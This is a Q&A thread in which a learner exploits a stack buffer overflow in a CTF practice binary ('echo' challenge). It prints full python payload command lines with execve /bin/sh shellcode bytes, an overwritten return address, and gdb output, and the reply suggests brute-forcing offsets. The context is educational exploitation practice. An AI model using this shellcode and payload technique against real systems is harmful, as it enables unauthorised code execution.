C Simple Buffer Overflow

Question

I'm trying to learn how buffer overflows work and how this can be used. I'm solving a simple challenge (backdoorlabs echo challenge) by trying to exploit a supplied binary file.

(see: http://hack.bckdr.in/ECHO/echo)

I think I'm doing everything right (accoring to the guides and tutorials I have been reading) but still it is not working and driving me crazy for hours now already.

The bufferoverflow lets me over write the next instruction (eip).

(gdb) run <<< $(python -c 'print "A"*62+"BBBB"')    

The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"BBBB"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)

So I'm able to overwrite the next eip, now lets add some 21 bytes shell code which spawns a shell and try to find the address where it is.

(gdb) run <<< $(python -c 'print "A"*62+"BBBB"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"BBBB"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB1▒▒▒Qh//shh/bin▒▒
         ̀

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/100x $sp
0xbffff750:     0xe1f7c931      0x2f2f6851      0x2f686873      0x896e6962
0xbffff760:     0xcd0bb0e3      0xbfff0080      0xbffff80c      0xb7fff3d0
0xbffff770:     0x08048480      0xffffffff      0x0012efc4      0x080482d8
0xbffff780:     0x00000001      0xbffff7c0      0x0011eb25      0x0012fab0

Bingo the shellcode is right here loaded at 0xbffff750, so that is the adress we want to adress the eip to..

Until now everything looks right to me so I try it with the right values found.

(gdb) run <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP▒▒▒1▒▒▒Qh//shh/bin▒▒
         ̀

Program received signal SIGSEGV, Segmentation fault.
0xbffff750 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.192.el6.i686
(gdb)


(gdb) x/i $eip
=> 0xbffff750:  xor    %ecx,%ecx
(gdb)

The eip got changed to the right adress and the shellcode is in place however when i try it in my shell it does not work and still segfaults as you can see.

[rick@TESTBOX tmp]$ ./vul <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP▒▒▒1▒▒▒Qh//shh/bin▒▒
         ̀
Segmentation fault
[rick@TESTBOX tmp]$

Anyone here has some thoughts about this, sees an error or has any other ideas ? As mentioned I'm a newbie trying to understand the basic principles and obviously I'm doing something wrong.

Answer 1

I think your problem is:

there is a difference between the real execution of a program and the gdb-controlled one.

You need to

1. predict this difference. And this question gives an example how to do it.

OR

2. I alse faced your problem months before. At that time, I observed this difference. But I did not use this way to find the difference, instead, I used the brute force way exampled in The Art of Exploitation 0x331: try different offsets with a shell script.

This question might help you in the future, which tells you how to turn off some security functions to allow you to attack.